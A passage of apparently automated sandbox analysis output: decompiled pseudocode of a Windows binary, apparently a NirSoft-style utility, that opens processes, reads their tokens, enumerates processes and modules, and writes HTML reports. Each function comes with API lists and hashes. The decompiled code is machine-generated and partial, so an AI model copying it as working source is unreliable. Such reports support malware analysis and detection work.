                                                                                                                				char _v316;
                                                                                                                				void _v826;
                                                                                                                				char _v828;
                                                                                                                				void _v1338;
                                                                                                                				char _v1340;
                                                                                                                				void* __esi;
                                                                                                                				void* _t61;
                                                                                                                				_Unknown_base(*)()* _t93;
                                                                                                                				void* _t94;
                                                                                                                				int _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                
                                                                                                                				_v828 = 0;
                                                                                                                				memset( &_v826, 0, 0x1fe);
                                                                                                                				_v1340 = 0;
                                                                                                                				memset( &_v1338, 0, 0x1fe);
                                                                                                                				_t110 = _t108 + 0x18;
                                                                                                                				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                				_t113 = _t61;
                                                                                                                				_v20 = _t61;
                                                                                                                				if(_t61 == 0) {
                                                                                                                					L11:
                                                                                                                					if(_v828 == 0) {
                                                                                                                						__eflags = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					_push( &_v828);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push(L"%s\\%s");
                                                                                                                					_push(0xff);
                                                                                                                					_push(_a8);
                                                                                                                					L0040B1EC();
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                				_t106 = _v24;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					_t32 =  &_v20; // 0x4059ec
                                                                                                                					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                					_v316 = 0;
                                                                                                                					memset( &_v315, 0, 0xfe);
                                                                                                                					_t110 = _t110 + 0x20;
                                                                                                                					_v16 = 0xff;
                                                                                                                					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L9:
                                                                                                                						CloseHandle(_v20);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeLibrary(_v8);
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_push( &_v28);
                                                                                                                					_push( &_a4);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push( &_v12);
                                                                                                                					_push( &_v828);
                                                                                                                					_a4 = 0xff;
                                                                                                                					_push( &_v316);
                                                                                                                					L8:
                                                                                                                					_v12 = 0xff;
                                                                                                                					E0040906D( &_v8, _t117);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_v316 = 0;
                                                                                                                				memset( &_v315, 0, 0xff);
                                                                                                                				_v12 = _t106;
                                                                                                                				_t110 = _t110 + 0xc;
                                                                                                                				_a4 = 0;
                                                                                                                				if(E00408F72( &_v8) == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                				if(_t93 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                				_t117 = _t94;
                                                                                                                				if(_t94 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push( &_v28);
                                                                                                                				_push( &_v12);
                                                                                                                				_push( &_v1340);
                                                                                                                				_push( &_v16);
                                                                                                                				_push( &_v828);
                                                                                                                				_push(_v316);
                                                                                                                				_v16 = 0xff;
                                                                                                                				goto L8;
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
                                                                                                                				void* _t1;
                                                                                                                				int _t2;
                                                                                                                				struct HINSTANCE__* _t5;
                                                                                                                
                                                                                                                				if( *0x4101bc != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = E00405436(L"psapi.dll");
                                                                                                                				_t5 = _t2;
                                                                                                                				if(_t5 == 0) {
                                                                                                                					L10:
                                                                                                                					return _t2;
                                                                                                                				} else {
                                                                                                                					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                					 *0x40f848 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                						 *0x40f840 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                							 *0x40f838 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                								 *0x40fa6c = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                									 *0x40f844 = _t2;
                                                                                                                									if(_t2 != 0) {
                                                                                                                										 *0x4101bc = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *0x4101bc == 0) {
                                                                                                                						_t2 = FreeLibrary(_t5);
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
                                                                                                                				void* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                
                                                                                                                				if( *0x4101b8 != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_t4 = _t2;
                                                                                                                				if(_t4 == 0) {
                                                                                                                					L9:
                                                                                                                					return _t2;
                                                                                                                				}
                                                                                                                				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                				 *0x40f83c = _t2;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                					 *0x40f834 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                						 *0x40f830 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                							 *0x40f5c4 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                								 *0x40f828 = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									 *0x4101b8 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t50;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t50 = __ecx;
                                                                                                                				_push(0x1fe);
                                                                                                                				_push(0);
                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                					_v1540 = 0;
                                                                                                                					memset( &_v1538, ??, ??);
                                                                                                                					_v1028 = 0;
                                                                                                                					memset( &_v1026, 0, 0x1fe);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					L0040B1EC();
                                                                                                                					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                					L0040B1EC();
                                                                                                                					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                					if (_t39 != 0) goto L3;
                                                                                                                					return _t39;
                                                                                                                				}
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, ??, ??);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fe);
                                                                                                                				L0040B1EC();
                                                                                                                				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                				L0040B1EC();
                                                                                                                				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                				void _v8202;
                                                                                                                				short _v8204;
                                                                                                                				void* _t27;
                                                                                                                				short _t29;
                                                                                                                				short _t40;
                                                                                                                				void* _t41;
                                                                                                                				struct HMENU__* _t43;
                                                                                                                				short _t50;
                                                                                                                				void* _t52;
                                                                                                                				struct HMENU__* _t59;
                                                                                                                
                                                                                                                				E0040B550(0x2008, __ecx);
                                                                                                                				_t65 = _a8 - 4;
                                                                                                                				if(_a8 != 4) {
                                                                                                                					__eflags = _a8 - 5;
                                                                                                                					if(_a8 == 5) {
                                                                                                                						_t50 =  *0x40fe2c; // 0x0
                                                                                                                						__eflags = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							L8:
                                                                                                                							_push(_a12);
                                                                                                                							_t27 = 5;
                                                                                                                							E00405E8D(_t27);
                                                                                                                							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                							__eflags = _t29;
                                                                                                                							_a8 = _t29;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                							}
                                                                                                                							_v8204 = 0;
                                                                                                                							memset( &_v8202, 0, 0x2000);
                                                                                                                							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                							__eflags = _v8204;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                							}
                                                                                                                							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                							DestroyWindow(_a8);
                                                                                                                						} else {
                                                                                                                							while(1) {
                                                                                                                								_t40 =  *_t50;
                                                                                                                								__eflags = _t40;
                                                                                                                								if(_t40 == 0) {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                								__eflags = _t40 - _a12;
                                                                                                                								if(_t40 != _a12) {
                                                                                                                									_t50 = _t50 + 4;
                                                                                                                									__eflags = _t50;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(_a12);
                                                                                                                					_t41 = 4;
                                                                                                                					E00405E8D(_t41);
                                                                                                                					_pop(_t52);
                                                                                                                					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                					_t59 = _t43;
                                                                                                                					_push(1);
                                                                                                                					_push(_t59);
                                                                                                                					_push(_a12);
                                                                                                                					E0040605E(_t52, _t65);
                                                                                                                					DestroyMenu(_t59);
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				void _v4098;
                                                                                                                				long _v4100;
                                                                                                                				void _v6146;
                                                                                                                				char _v6148;
                                                                                                                				void* __esi;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                
                                                                                                                				_t49 = __ecx;
                                                                                                                				E0040B550(0x1800, __ecx);
                                                                                                                				_t57 = _t49;
                                                                                                                				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                				_v4100 = 0;
                                                                                                                				memset( &_v4098, 0, 0x7fe);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				_v6148 = 0;
                                                                                                                				memset( &_v6146, 0, 0x7fe);
                                                                                                                				_t59 = _t58 + 0x24;
                                                                                                                				_t62 =  *0x40fe30; // 0x0
                                                                                                                				if(_t62 != 0) {
                                                                                                                					_push(0x40fe30);
                                                                                                                					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t59 = _t59 + 0x10;
                                                                                                                				}
                                                                                                                				_t63 =  *0x40fe28; // 0x0
                                                                                                                				if(_t63 != 0) {
                                                                                                                					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                				}
                                                                                                                				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v6148);
                                                                                                                				L0040B1EC();
                                                                                                                				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                				_t64 = _a8 - 5;
                                                                                                                				if(_a8 == 5) {
                                                                                                                					return E00407D03(_t57, _t64, _a4);
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                				void _v526;
                                                                                                                				long _v528;
                                                                                                                				wchar_t* _t17;
                                                                                                                				signed int _t40;
                                                                                                                				wchar_t* _t50;
                                                                                                                
                                                                                                                				_t50 = __edi;
                                                                                                                				if(__esi[0] != 0x3a) {
                                                                                                                					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                					if(_t17 == 0) {
                                                                                                                						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                						if(_t40 < 0) {
                                                                                                                							if( *__esi != 0x5c) {
                                                                                                                								wcscpy(__edi, __esi);
                                                                                                                							} else {
                                                                                                                								_v528 = 0;
                                                                                                                								memset( &_v526, 0, 0x208);
                                                                                                                								E00404C08( &_v528);
                                                                                                                								memcpy(__edi,  &_v528, 4);
                                                                                                                								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                								wcscat(__edi, __esi);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_v528 = 0;
                                                                                                                							memset( &_v526, 0, 0x208);
                                                                                                                							E00404C08( &_v528);
                                                                                                                							wcscpy(__edi,  &_v528);
                                                                                                                							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						return _t50;
                                                                                                                					}
                                                                                                                					_push( &(_t17[0]));
                                                                                                                					L4:
                                                                                                                					wcscpy(_t50, ??);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_push(__esi);
                                                                                                                				goto L4;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
                                                                                                                				signed int _v8;
